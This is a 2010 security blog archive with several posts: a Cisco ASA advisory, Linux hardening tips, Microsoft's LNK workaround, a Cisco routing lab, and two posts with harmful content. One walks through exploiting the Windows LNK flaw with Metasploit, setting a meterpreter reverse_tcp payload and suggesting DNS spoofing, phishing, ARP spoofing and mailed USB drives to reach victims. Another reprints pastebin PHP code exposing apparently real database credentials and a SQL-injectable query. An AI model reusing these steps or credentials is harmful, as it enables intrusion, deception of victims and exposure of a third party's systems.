Aug 04 2010

Multipple Vulnerabilities in Cisco ASA 5500 Series “Public Release 2010 August 04″

I received notification of the following vulnerabilities outlined below via the full disclosure mail list but you can find a direct link to it here –> Link. I figured it was worth mentioning again since most organization depend on their Firewall as the primary means of protection against the many threats on the  internet.

The Cisco ASA 5500 Series Adaptive Security Appliance is a modular platform that provides security and VPN services. It offers firewall, intrusion prevention system (IPS), anti-X, and VPN services.

Cisco ASA 5500 Series Adaptive Security Appliances are affected by the following vulnerabilities:

SunRPC Inspection Denial of Service Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Sun RPC inspection engine enables or disables application inspection for the Sun RPC protocol. Sun RPC is used by Network File System (NFS) and Network Information Service (NIS). Sun RPC services can run on any port. When a client attempts to access a Sun RPC service on a server, it must learn the port that service is running on. The client does this by querying the port mapper process, usually rpcbind, on the well-known port of 111. Three DoS vulnerabilities affect the SunRPC inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances, in which an unauthenticated attacker may cause the affected device to reload.

Note:  Only transit traffic can trigger these vulnerabilities; traffic that is destined to the appliance will not trigger the vulnerabilities. These vulnerabilities can be triggered by using UDP packets, not TCP.

These vulnerabilities are documented in Cisco bug IDs CSCtc77567, CSCtc79922, and CSCtc85753; and have been assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2010-1578, CVE-2010-1579, and CVE-2010-1580, respectively.

Transport Layer Security (TLS) Denial of Service Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TLS and its predecessor, SSL, are cryptographic protocols that provide security for communications over IP data networks such as the Internet.

Three vulnerabilities exist on the Cisco ASA security appliances that can be triggered by a series of crafted TLS packets. An unauthenticated attacker may cause the affected device to reload. A Cisco ASA device configured for SSL VPN, TLS Proxy for Encrypted Voice Inspection, or configured to accept ASDM management connections is vulnerable.

These vulnerabilities are documented in Cisco bug IDs CSCtd32627, CSCtf37506, and CSCtf55259; and have been assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2010-1581, CVE-2010-2814, and CVE-2010-2815, respectively.

Session Initiation Protocol (SIP) Inspection Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SIP, as defined by the Internet Engineering Task Force (IETF), enables call handling sessions, particularly two-party audio conferences, or “calls.” SIP works with SDP for call signalling. SDP specifies the ports for the media stream. Using SIP, the Cisco ASA can support any SIP VoIP gateways and VoIP proxy servers. To support SIP calls through the Cisco ASA, signaling messages for the media connection addresses, media ports, and embryonic connections for the media must be inspected, because while the signaling is sent over a well-known destination port (UDP/TCP 5060), the media streams are dynamically allocated. Also, SIP embeds IP addresses in the user-data portion of the IP packet. SIP inspection applies NAT for these embedded IP addresses.

A DoS vulnerability affects the SIP inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances. SIP inspection is enabled by default. During successful exploitation, an unauthenticated attacker may cause the affected device to reload.

Note:  Only transit traffic can trigger these vulnerabilities; traffic that is destined to the appliance will not trigger the vulnerabilities.

This vulnerability is documented in Cisco bug ID CSCtd32106 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-2816.

Crafted Internet Key Exchange (IKE) Message Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

IPsec is an IP security feature that provides robust authentication and encryption of IP packets. IKE is a key management protocol standard that is used in conjunction with the IPsec standard. A DoS vulnerability exists in the IKE implementation of the Cisco ASA.

During successful exploitation, an unauthenticated attacker may cause an affected device to reload.

Note:  Only traffic that is destined to the appliance may trigger this vulnerability when the affected device is configured for IPsec remote access or site-to-site VPNs.

This vulnerability is documented in Cisco bug ID CSCte46507 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-2817.

As a side note I would like to add that unless you are already running on version 8.3 you should disable the vulnerable services and take a moment to read the release note for version 8.3.

The are some syntax changes you have to adjust too, as well as do a full rule set conversion. Below is an example of an old rule and its recommended migrated counterpart. Some of the migrated rules and not all new since the were supported in older IOS version, however its now mandatory to do them the proper/recommended way instead of the older way.

Old Configuration

static (inside,outside) tcp 172.23.57.170 5080 10.50.50.50 80

access-list 1 extended permit tcp any host 172.23.57.170 eq 5080

access-list 1 extended permit udp any host 172.23.57.170 eq 5080

access-list 1 extended permit tcp any host 172.23.57.170 eq 10000

access-list 1 extended permit tcp any host 10.2.3.4 eq 5080

access-group 1 in interface outside

Migrated Configuration

static (inside,outside) tcp 172.23.57.170 5080 10.50.50.50 access-list 1 extended permit tcp any host 10.50.50.50 eq 80

access-list 1 extended permit udp any host 172.23.57.170 eq 5080

access-list 1 extended permit tcp any host 172.23.57.170 eq 10000

access-list 1 extended permit tcp any host 10.2.3.4 eq 5080

access-group 1 in interface outside

Jul 29 2010

Linux Basix Security Tips Part 1

A while back I hinted to the wonderful guys over at  http://www.linuxbasix.com/ that I would like to appear on the show and do a segment on Linux security, the agreed and below are some of the notes that can be used to follow alone with my segment.

Disclaimer: I am by no means a Linux security expert; I am just trying to bring some visibility to a topic that I believe all new users should think about.

Taken from the Linux basix website, our goal here is to bring together information that will make your introduction to Linux and Open Source Software more enjoyable and productive. As we go along we will be constantly updating this site with our shows and show notes. If you have any questions please post comments to the shows and blog. Feel free to let us know what you think of the show and we will do our best to make it make as much sense as possible. Once the forum is up and running it will be a source to find answers, tips and tricks to make computing more enjoyable.

The goal of my segment is not to touch on anything too advance, for that you can find several Linux hardening guide by CERT, NSA, and many more resources out there. Instead I will be focusing on giving a few tips that anyone new to Linux should keep in mind before connecting their server/workstation to the internet.

I would like to start by sharing a few sentences I found in a blog posting over at computer world;

“You see Windows was designed as a single-user, non-networked operating system. That design is still at the heart of Windows, which is why security must always be an add-on to Windows. Linux, in contrast, was built from the ground up as a multi-user, networked system. Linux, like Unix, which came before it, was constructed to work in a world with hostile users.”

Physical Security ( might seem silly but this should always be considered)

Configure the BIOS to disable booting from CDs/DVDs, external devices, and set a password to protect these settings, you can also go another step by encrypting your entire drive. Next, set a password for the GRUB bootloader.

  • Generate a password hash using the command  /usr/sbin/grub-md5-crypt.
  • Add the hash to the first line of /boot/grub/menu.lst as follows: password –md5 passwordhash

Minimum install as possible

Take a moment to think about your installation, I understand you might not know exactly what you want but don’t install everything at first. Just do the basics and as you learn more you can then install those additional application and do it properly. Also remove unnecessary packages, only keep the ones you need, and lastly remove any accounts that are not needed.

# yum list installed
# yum list packageName
# yum remove packageName

OR

# dpkg –list
# dpkg –info packageName
# apt-get remove packageName

Stay away form clear text protocols

Under no circumstances do you want to use any clear text protocol. Any of the following  protocols or programs   (telnet, rsh, rlogin, FTP, TFTP) can give out your username/password to anyone on your local network with a packet sniffer. If you are hosting a website or providing users with a login portal ensure that you are not using http, but instead https even if you have to generate your own certificate.

Identify all open ports and services

Its important to know what ports you have open and what services are associated to them this way you can decide if you would like to block or filter them with a firewall. This is also important so in the event you notice a new port open you already have a baseline to compare it too.

To do you can use a tool like  Nmap (“Network Mapper”) which is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

ex nmap -A -sV 127.0.0.1

You can also use the following for identifying and turning off unwanted services:

To view all services that are turned on:
# chkconfig --list | grep '3:on'

To disable a service:

# service serviceName stop
# chkconfig serviceName off

Security software

  • Install Antivirus software, I am aware that Linux is not highly prone to viruses like your average Windows PC, but don’t for a moment think that Linux is not being successfully exploited in the wild every day. You want to ensure that you are not the “Low Hanging Fruit” in short don’t be the easy target.
  • Install/configure firewall (SELinux, IP Tables, and AppArmor) and take a moment to read how to configure it.

Keep Your Software Up to Date

  • Configure your system to update via your software repository and apply then automatically. Security updates should be applied as soon as possible.
  • Create the file apt.cron, make it executable, place it in /etc/cron.daily or /etc/cron.weekly, and ensure that it reads as follows:

#!/bin/sh
/usr/bin/apt-get update
#
Or aptitude –s safe-upgrade

Password policy

  • You want to insure that you have a proper password policy, first identify any user accounts that has an empty password and set on or remove the account.
  • Setup password aging, its important to keep rotating your password a minimum every 60 days.
  • Set up some sort of password lockout policy, if someone attempts a brute force attempt you need to at least slow them down, a standard practice is to lockout an account after 3 failed login attempts.To get password expiration information, enter:
    chage -l userName

    To see failed login attempts, enter:
    faillog

    To unlock an account after login failures, run:
    faillog -r -u userName

    Note you can use passwd command to lock and unlock accounts:
    # lock account
    passwd -l userName

    # unlock account
    passwd -u userName

    Identify empty passwords type the following command
    # awk -F: ‘($2 == “”) {print}’ /etc/shadow

Make Sure No Non-Root Accounts Have UID Set To 0

Only root account have UID 0 with full permissions to access the system. Type the following command to display all accounts with UID set to 0:

# awk -F: '($3 == "0") {print}' /etc/passwd

You should only see one line as follows:
root:x:0:0:root:/root:/bin/bash

If you see other lines, delete them or make sure other accounts are authorized by you to use UID 0.

File and file system security

SUID and SGID files on your system are a potential security risk, and should be monitored closely. Because these programs grant special privileges to the user who is executing them, it is necessary to ensure that insecure programs are not installed. A favorite trick of crackers is to exploit SUID-root programs, then leave a SUID program as a back door to get in the next time, even if the original hole is plugged.

  • Find all SUID/SGID programs on your system, and keep track of what they are, so you are aware of any changes which could indicate a potential intruder. Use the following command to find all SUID/SGID programs on your system:

root# find  / -type  f \ ( -perm -04000 -o -perm -02000 \)

World-writable files, particularly system files, can be a security hole if a cracker gains access to your system and modifies them. Additionally, world-writable directories are dangerous, since they allow a cracker to add or delete files as he wishes. (can upload malware to a site and infect visitors)

To locate all world-writable files on your system, use the following command:

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print

Secure ssh remote access

  • Disable root login via ssh, if someone is going to try and brute force your ssh server the first user name the will try will be root, so ensure that you do not allow ssh login for your root user. You can verify or edit this but changing the config file in:

vi /etc/ssh/sshd_config

Find this section in the file, containing the line with “PermitRootLogin” in it.

#LoginGraceTime 2m
#PermitRootLogin no
#StrictModes yes
#MaxAuthTries 6

Then restart your SSH service with sudo /etc/init.d/sshd restart

Noowner Files

Files not owned by any user or group can pose a security problem. Just find them with the following command which do not belong to a valid user and a valid group.

find /dir -xdev \( -nouser -o -nogroup \) -print

Keeping an eye on your logs:

You should configure logging and auditing so you can keep an eye on any type of  attacks that are launched against your system. You can manually check the following logs or use a tool like logwatch or logcheck or any number of log parsers out there. Logs of interest are :

  • /var/log/syslog
  • /var/log/faillog
  • /var/log/auth
  • /var/log/lastlog
  • /var/log/messages
  • /var/log/apahe2/access.log and error.log

When all else fail, here are some useful Scripts and tools you can use:

Lynis: Lynis is an auditing tool for Unix (specialists). It scans the system and available software, to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes.

Security audit tool,is a security tool that can be used both as a security audit as well as a part of an intrusion detection system. It consists of set of tests, library and textual/graphical front-end. Tests are sorted into groups and security levels. Administrators can run selected tests, groups or whole security levels.

The Bastille Hardening program “locks down” an operating system, proactively configuring the system for increased security and decreasing its susceptibility to compromise. Bastille can also assess a system’s current state of hardening, granularity reporting on each of the security settings with which it works.

audit2.pl (perl): This second script searches the entire file system, listing SUID, SGID, world-writable, group-writable files. It also lists trust files and their contents. Finally it lists files with weird names (e.g., containing punctuation characters), which might be danger or a sign of penetration. On a large server with 100GB disks, this can take a few hours to run.

Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2).  It tries to find misconfiguration that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).

DenyHosts is a script intended to be run by Linux system administrators to help thwart SSH server attacks (also known as dictionary based attacks and brute force attacks).

OpenVAS stands for Open Vulnerability Assessment System and is a network security scanner with associated tools like a graphical user front-end. The core component is a server with a set of network vulnerability tests (NVTs) to detect security problems in remote systems and applications.

References:

http://iase.disa.mil/stigs/checklist/index.html

http://www.sans.org/score/checklists/linuxchecklist.pdf

http://www.nsa.gov/ia/_files/os/redhat/rhel5-guide-i731.pdf

http://georgia.ubuntuforums.org/showthread.php?t=1002167&page=2

http://boilinglinux.blogspot.com/2008/07/ubuntu-hardy-hardening.html

http://www.cyberciti.biz/tips/linux-security.html

http://www.debian.org/doc/manuals/securing-debian-howto/

http://tldp.org/HOWTO/Security-HOWTO/file-security.html

http://blogs.computerworld.com/16367/dell_back_tracks_on_linux_being_safer_than_windows

http://www.rootkit.nl/projects/lynis.html

https://fedorahosted.org/sectool/

http://www.security-database.com/toolswatch/

http://securitytube.net/Mastering-IPTables-video.aspx

http://nmap.org/

http://www.openvas.org/

http://www.bastille-unix.org/

http://denyhosts.sourceforge.net/

http://pentestmonkey.net/tools/unix-privesc-check/

http://www.boran.ch/audit

http://oreilly.com/pub/h/66

http://www.howtogeek.com/howto/linux/security-tip-disable-root-ssh-login-on-linux/

http://www.cyberciti.biz/faq/linux-log-files-location-and-how-do-i-view-logs-files/

Jul 22 2010

Exploiting MS “LNK” Vulnerability

A few days ago I posted a blog entry called Microsoft Validates Shortcut Vulnerability, this entry basically explains what the issue is and also listed a few basic mitigation techniques.

Below I will be demonstrating how you can actively exploit this vulnerability using Metasploit.

Proof of concept testing:
This test was preformed using my BT4 VM which was assigned IP address 192.168.126.135 and a Win XPSP3 VM using IP address 192.168.126.134.

Step 1: Load Metasploit and get latest update

On my BackTrack4 VM, I browsed to /pentest/exploit/framework3, then load msfconsole once that is loaded run svn update so you can get the latest and greatest.

Fig-1 SVN Update

Step 2: Select your Exploit and Payload

msf > use exploit/windows/browser/ms10_xxx_Windows_shell_lnk_execute

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > show options

The show options commands will show you the various parameters  that needs to be set in order for the exploit to be functional. In our case its setting up the listening IP and listening port.

Fig-2  Choosing Exploit and Payload

Step 3: Fill-in required options and run exploit

At this stage you simply fill in the correct IP address and listening port for the machine that you are launching the attack from. If this is not correct the victim machine would not know where to connect back too, since I selected reverse_tcp.

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > SET SRVHOST 192.168.126.135

msf exploit(ms10_xxx_Windows_shell_lnk_execute) >SET LHOST 192.168.126.135

msf exploit(ms10_xxx_Windows_shell_lnk_execute) >exploit

Fig-3 Fill-in LHOST and SRVHOST

Step 4: Get your victim to click the link or view the malicious file

Now at this stage  you have to get a bit creative, I can suggest a few things you can try:

  • Use Ettercap to DNS spoof a target network and redirect them to your malicious URL, example.
  • Use a tool like Social Engineering Toolkit “SET” to send a spoofed email with your malicious link, example.
  • ARP spoof your host network and find a given target that’s using Facebook or one of  many social networks and try to send them the link that way.
  • Try a far out social engineering  attack like purchase several USB drives inject them and mail them to your target with the label “free USB drive”.

Once you have your targets in sight just sit back and wait, once an exploitation has been kicked off you will see the below;

Fig-4 Successful Exploit

Verify you have an active session, session using sessions -l, next connect to that session with sessions -i #, from here you can run help to get a list of possible commands. I simply ran ipconfig and getuid to show that I was on the Windows XPVM and that it was successfully exploited.

Fig-5 Running Commands on exploited host

Fig-6 Popup box on exploited host

In the end there is really not much the average user can do that is not aware of your everyday vulnerability, but us as IT professional need to be in the loop so that we can take back the information and make them aware. Lastly the image in figure 6 should be a dead giveaway that something is up with your computer if you didn’t connect to a share but all of sudden you see one pop-up its time for a “wipe and reinstall.” Have fun until Microsoft patches this one and remember to be responsible. All feedback are welcome.



Jul 22 2010

Being smart about testing your application

This is just going to be a short writeup on something I figure was worth mentioning. While going through pastebin I found the following entry  3 seconds after it was posted–> http://pastebin.com :

<?php

include ‘top.php’;

include ‘submenuhonorshall.php’;

/*SELECT * FROM TABLE WHERE field =

*/

$db = ‘gnemi_addison’;

mysql_connect(“gnemi.php-corner.com”, “gnemi_root”, “ignurupi87″) or die(mysql_error());

mysql_select_db($db) or die(mysql_error());

?>

<div id=”content”>

<h1>Honors Hall Library</h1>

<form method=”post”>

<p class=”norm”>

<select name=”searchby”>

<option value=”Author_First_Name”>Author First Name</option>

<option value=”Author_Last_Name” selected=”selected”>Author Last Name</option>

<option value=”Title”>Title</option>

</select>

<input type=”text” name=”query” />

<input type=”submit” value=”Submit!” />

</p>

</form>

<?php

$result = mysql_query(“SELECT * FROM `library` WHERE `’” . $_POST['searchby'] . “‘` = ‘” . $_POST['query'] . “‘ ORDER BY `Title` LIMIT 20″);

while ($row = mysql_fetch_array($result))

{

echo $row['Last Name'] . $row['First Name'] . $row['Title'] .$row['inout'];

}

?>

<?php

include ‘../address.php’;

include ‘../phptemplates/bottomhall.php’;

?>

Now to the average person that’s not a big deal, but to me after looking at that bit of php code the following questions came to mind:

  • Would I find anything useful if I were to Google the various pages referenced in that code or maybe the domain “gnemi.php-corner.com”?
  • What if I ran a whois lookup against that domain what would I find?
  • What if I Google the email addresses associated with that domain?
  • And most importantly are the username and password referenced stilling being used currently?
  • Are those tables and DB name real or just test names?
  • Would I find anything interesting if I were to crawl that website?

Now a simple whois returned a valid email address along with some other useful information:

And just out of curiosity after visiting http://gnemi.php-corner.com/godWindow/ I was presented with the following:

Now I ***DID NOT LOGIN*** I repeat  ***DID NOT LOGIN*** so I don’t know if those credential are valid BUT what if the were? I am hoping for this person’s sake all of the above information is just for testing purposes but what if its no? Sanitizing all valid  information before posting it would have been nice.

Jul 19 2010

Microsoft Validates Shortcut Vulnerability

Last Thursday I read a posting over at   http://krebsonsecurity.com referencing  a potential vulnerability that relates to the way how Windows parses shortcuts. Since Microsoft didn’t confirm this at the time it was just another  interesting read. Now one day later Microsoft did validate this claim and now its yet another Windows zero-day without a proper workaround.

Issue:

The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the user clicks the displayed icon of a specially crafted shortcut. This vulnerability is most likely to be exploited through removable drives. For systems that have AutoPlay disabled, customers would need to manually browse to the root folder of the removable disk in order for the vulnerability to be exploited.

Workaround:

Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

Disable the displaying of icons for shortcuts

Note Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the “Changing Keys And Values” Help topic in Registry Editor (Regedit.exe) or view the “Add and Delete Information in the Registry” and “Edit Registry Data” Help topics in Regedt32.exe.

1. Click Start, click Run, type Regedit in the Open box, and then click OK
2. Locate and then click the following registry key:

HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler

3. Click the File menu and select Export
4. In the Export Registry File dialog box, enter LNK_Icon_Backup.reg and click Save

Note This will create a backup of this registry key in the My Documents folder by default

5. Select the value (Default) on the right hand window in the Registy Editor. Press Enter to edit the value of the key. Remove the value, so that the value is blank, and press Enter.
6. Restart explorer.exe or restart the computer.

Impact of workaround.Disabling icons from being displayed for shortcuts prevents the issue from being exploited on affected systems. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.

Disable the WebClient service

Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround, it will still be possible for remote attackers who successfully exploited this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user’s computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet.

To disable the WebClient Service, follow these steps:

1. Click Start, click Run, type Services.msc and then click OK.
2. Right-click WebClient service and select Properties.
3. Change the Startup type to Disabled. If the service is running, click Stop.
4. Click OK and exit the management application.

Impact of workaround. When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the Web Client service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer.

How to undo the workaround.

To re-enable the WebClient Service, follow these steps:

1. Click Start, click Run, type Services.msc and then click OK.
2. Right-click WebClient service and select Properties.
3. Change the Startup type to Automatic. If the service is not running, click Start.
4. Click OK, and exit the management application.

This brings up the same concern I spoke about in this post , now that Microsoft is no longer supporting SP2 we can add this to the list of exploits that we can always be certain will work on the SP2 platform. In the end, if the workaround is not hindering any mission critical application  I think everyone should apply it.

References:

http://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-shortcut-flaw/

http://www.computerworld.com/s/article/9179299/Microsoft_confirms_nasty_Windows_zero_day_bug?taxonomyId=17

http://www.microsoft.com/technet/security/advisory/2286198.mspx

http://clubhouse.microsoft.com/Public/Post/48631f1c-c884-4d3e-a19b-c9994bcd4637

Click OK and exit the management application.

Jul 13 2010

Cisco Administrative Distance Manipulation – Part 1

Ok – “infolookup” has been asking for my contribution to his blog for quite some time now.  This is my first and hopefully not the last.

Recently I needed to meet a redundancy requirement on a Cisco router running both EIGRP and OSPF. The requirement was simple: favor the prefix learned via EIGRP and use the prefix learned via OSPF as a backup. I must also mention that the prefix is an EIGRP (D EX) route, which has an AD of 170 and an OSPF (O E2) route which has an AD of 110. In the first part of this article, I will go through the setup of the lab, which closely simulates the scenario I had and in the second part, will go through the actual remedy implemented that resulted in a “happy network”.

Let’s get to it.

First, let’s go through the topology. This lab contains 5 routers: R0 – R5 as follows:

R0 = Representing a 3rd party network , who is advertising 198.200.230.0/24; 222.102.23.0/24; 0.0.0.0/0; 172.203.46.0/24

R1 = R0′s BGP peer / NAT point of our network / redistribution point of BGP to EIGRP

R2 = The Main router running EIGRP, RIP & OSPF (Think of this as the CORE of a particular site)

R3 = Router running RIP and OSPF. This provides a backup route towards one of the destinations available from R0 (222.102.23.0/24)

R4 = Router running OSPF. This provides a backup route towards one of the destinations available from R0  (198.200.230.0/24)

Please see Topology Diagram:

Administrative Distance Lab Topology

R0′s relevant configuration:

hostname R0
!
interface Loopback0
ip address 198.200.230.1 255.255.255.0
!
interface Loopback1
ip address 222.102.23.1 255.255.255.0
!
interface Loopback2
ip address 172.203.46.1 255.255.255.0
!
interface FastEthernet0/0
description FastE to R1
ip address 10.146.12.2 255.255.255.254
duplex auto
speed auto
!
router bgp 65000
no synchronization
bgp log-neighbor-changes
network 0.0.0.0
network 172.203.46.0 mask 255.255.255.0
network 198.200.230.0
network 222.102.23.0
neighbor R1-eBGP peer-group
neighbor R1-eBGP remote-as 65001
neighbor R1-eBGP route-map ROUTER-1-IN in
neighbor R1-eBGP route-map ROUTER-1-OUT out
neighbor 10.146.12.3 peer-group R1-eBGP
no auto-summary
!
ip route 0.0.0.0 0.0.0.0 Null0
!
ip prefix-list R1-IN seq 5 permit 172.32.27.0/24
!
ip prefix-list R1-OUT seq 5 permit 198.200.230.0/24
ip prefix-list R1-OUT seq 10 permit 222.102.23.0/24
ip prefix-list R1-OUT seq 15 permit 172.203.46.0/24
ip prefix-list R1-OUT seq 20 permit 0.0.0.0/0
!
route-map ROUTER-1-IN permit 10
match ip address prefix-list R1-IN
!
route-map ROUTER-1-OUT permit 10
match ip address prefix-list R1-OUT
!
Nothing fancy here, just basic BGP peering and prefix advertisement filters (in/outbound).

R1′s relevant configuration:
hostname R1
!
ip address 172.32.27.1 255.255.255.0
!
interface Loopback1
ip address 172.25.240.1 255.255.255.0
!
interface FastEthernet0/0
description FastE to R0

ip address 10.146.12.4 255.255.255.254
ip nat inside
ip virtual-reassembly

duplex auto
speed auto
!
interface FastEthernet1/0
description FastE to R2

ip address 10.146.12.3 255.255.255.254
ip nat outside
ip virtual-reassembly

duplex auto
speed auto
!
router eigrp 200
redistribute bgp 65001 metric 1 1 1 1 1
network 10.146.12.4 0.0.0.0
network 172.25.240.1 0.0.0.0
no auto-summary
!
router bgp 65001
no synchronization
bgp log-neighbor-changes
network 172.32.27.0 mask 255.255.255.0
neighbor R0-eBGP peer-group
neighbor R0-eBGP remote-as 65000
neighbor R0-eBGP route-map ROUTER-0-OUT out
neighbor 10.146.12.2 peer-group R0-eBGP
no auto-summary
!
ip nat pool OVERLOAD 172.32.27.100 172.32.27.100 netmask 255.255.255.0
ip nat inside source list 10 pool OVERLOAD overload
!
ip prefix-list R0-OUT seq 5 permit 172.32.27.0/24
!
access-list 10 deny 10.146.12.3
access-list 10 permit any
!
route-map ROUTER-0-OUT permit 10
match ip address prefix-list R0-OUT
!

Not too fancy either. Doing BGP to EIGRP redistribution and performing NAT on traffic sourcing from ACL 10. Since R1 is only advertising 172.32.27.0/24 to R0, without the NATing on R1, I wouldn’t be able to ping R0′s loopbacks from R4 for example.

R2′s relevant configuration:

hostname R2
! interface FastEthernet0/0
ip address 10.146.12.5 255.255.255.254
duplex auto
speed auto
!
interface FastEthernet1/0
ip address 172.19.200.1 255.255.255.0
duplex auto
speed auto
!
router eigrp 200
redistribute ospf 100 metric 1 1 1 1 1
network 10.146.12.5 0.0.0.0
no auto-summary
!
router ospf 100
router-id 172.19.200.1
log-adjacency-changes
network 172.19.200.1 0.0.0.0 area 0
network 172.25.196.1 0.0.0.0 area 0
default-information originate always
!
router rip
version 2
network 172.19.0.0
no auto-summary
!

Probably the simplest of all the configs, but this is the key router on which we’ll be going through the Administrative Distance (AD) exercise.   Not a lot to explain here either.  Redistributing OSPF into EIGRP, so that R1 knows of the subnets from R3/4 as well as the shared segment between R2/R3 and R4.

R3′s relavant configuration:


hostname R3
!
!
interface Loopback1
ip address 11.12.13.1 255.255.252.0
!
interface Loopback2
ip address 14.15.16.1 255.255.252.0
!
interface Loopback3
ip address 201.200.200.2 255.255.255.0
!
interface Loopback4
ip address 199.199.199.1 255.255.255.0
!
interface FastEthernet0/0
ip address 172.19.200.2 255.255.255.0
duplex auto
speed auto
!
router ospf 100
router-id 172.19.200.2
log-adjacency-changes
network 11.12.13.1 0.0.0.0 area 0
network 14.15.16.1 0.0.0.0 area 0
network 172.19.200.2 0.0.0.0 area 0
distribute-list prefix DEFAULT-ONLY in
!
router rip
version 2
redistribute static
network 172.19.0.0
no auto-summary
!
ip route 222.102.23.0 255.255.255.0 Null0
!
!
ip prefix-list DEFAULT-ONLY seq 5 permit 0.0.0.0/0
!

A few things to note here.  Although Lo1/2 and Fa0/0 are in OSPF, I am only allowing a default (0.0.0.0/0) to be installed into the routing table from the OSPF process.  Also note the static route to Null0;  This is a lab after all, instead of having a dummy host on the other side of an interface, I created the static to Null0 so I can have a “live” static route to play with (ie. “redistribute static” under rip)

R4′s relavant configuration:

hostname R4
!
interface Loopback1
ip address 199.20.46.1 255.255.254.0
!
interface Loopback2
ip address 198.22.12.1 255.255.254.0
!
interface FastEthernet0/0
ip address 172.19.200.3 255.255.255.0
duplex auto
speed auto
!
router ospf 100
router-id 172.19.200.3
log-adjacency-changes
redistribute static subnets
network 172.19.200.3 0.0.0.0 area 0
distribute-list prefix DEFAULT-ONLY in
!
ip route 198.200.230.0 255.255.255.0 Null0
!
!
ip prefix-list DEFAULT-ONLY seq 5 permit 0.0.0.0/0

A few things to note here. Much like R3, Lo1/2 and Fa0/0 are in OSPF, I am only allowing a default (0.0.0.0/0) to be installed into the routing table from the OSPF process. Also note the static route to Null0;

Ok – Enough configuration.  Let’s look at some show command to verify that the network is up and running as we want and also point out the behavior that needs correcting – to be done in Part 2.


+++++++ R0
R0#sh ip bgp summary | b Neigh
Neighbor V AS MsgRcvd MsgSent TblVer InQ OutQ Up/Down State/PfxRcd
10.146.12.3 4 65001 1677 1677 14 0 0 1d03h 1
R0#sh ip bgp neighbors 10.146.12.3 advertised-routes | b Net
Network Next Hop Metric LocPrf Weight Path
*> 0.0.0.0 0.0.0.0 0 32768 i
*> 172.203.46.0/24 0.0.0.0 0 32768 i
*> 198.200.230.0 0.0.0.0 0 32768 i
*> 222.102.23.0 0.0.0.0 0 32768 i
Total number of prefixes 4
R0#sh ip bgp | b Net
Network Next Hop Metric LocPrf Weight Path
*> 0.0.0.0 0.0.0.0 0 32768 i
*> 172.32.27.0/24 10.146.12.3 0 0 65001 i
*> 172.203.46.0/24 0.0.0.0 0 32768 i
*> 198.200.230.0 0.0.0.0 0 32768 i
*> 222.102.23.0 0.0.0.0 0 32768 i
R0#
Total number of prefixes 1
R1#
R1#sh ip nat statistics
Total active translations: 0 (0 static, 0 dynamic; 0 extended)
Outside interfaces:
FastEthernet1/0
Inside interfaces:
FastEthernet0/0
Hits: 409 Misses: 8
CEF Translated packets: 181, CEF Punted packets: 16
Expired translations: 47
Dynamic mappings:
-- Inside Source
[Id: 1] access-list 10 pool OVERLOAD refcount 0
pool OVERLOAD: netmask 255.255.255.0
start 172.32.27.100 end 172.32.27.100
type generic, total addresses 1, allocated 0 (0%), misses 102
Appl doors: 0
Normal doors: 0
Queued Packets: 0
R1#

R2#sh ip route eigrp
172.203.0.0/24 is subnetted, 1 subnets
D EX 172.203.46.0 [170/2560002816] via 10.146.12.4, 1d03h, FastEthernet0/0
172.25.0.0/24 is subnetted, 1 subnets
D 172.25.240.0 [90/156160] via 10.146.12.4, 1d05h, FastEthernet0/0
172.32.0.0/24 is subnetted, 1 subnets
D EX 172.32.27.0 [170/2560002816] via 10.146.12.4, 1d02h, FastEthernet0/0
D*EX 0.0.0.0/0 [170/2560002816] via 10.146.12.4, 1d03h, FastEthernet0/0
R2#sh ip route ospf
O E2 198.200.230.0/24 [110/20] via 172.19.200.3, 1d02h, FastEthernet1/0
11.0.0.0/32 is subnetted, 1 subnets
O 11.12.13.1 [110/2] via 172.19.200.2, 1d02h, FastEthernet1/0
14.0.0.0/32 is subnetted, 1 subnets
O 14.15.16.1 [110/2] via 172.19.200.2, 1d02h, FastEthernet1/0
R2#sh ip route rip
R 222.102.23.0/24 [120/1] via 172.19.200.2, 00:00:16, FastEthernet1/0
R2#

+++++++ R3

R3#sh ip route ospf
O*E2 0.0.0.0/0 [110/1] via 172.19.200.1, 1d02h, FastEthernet0/0
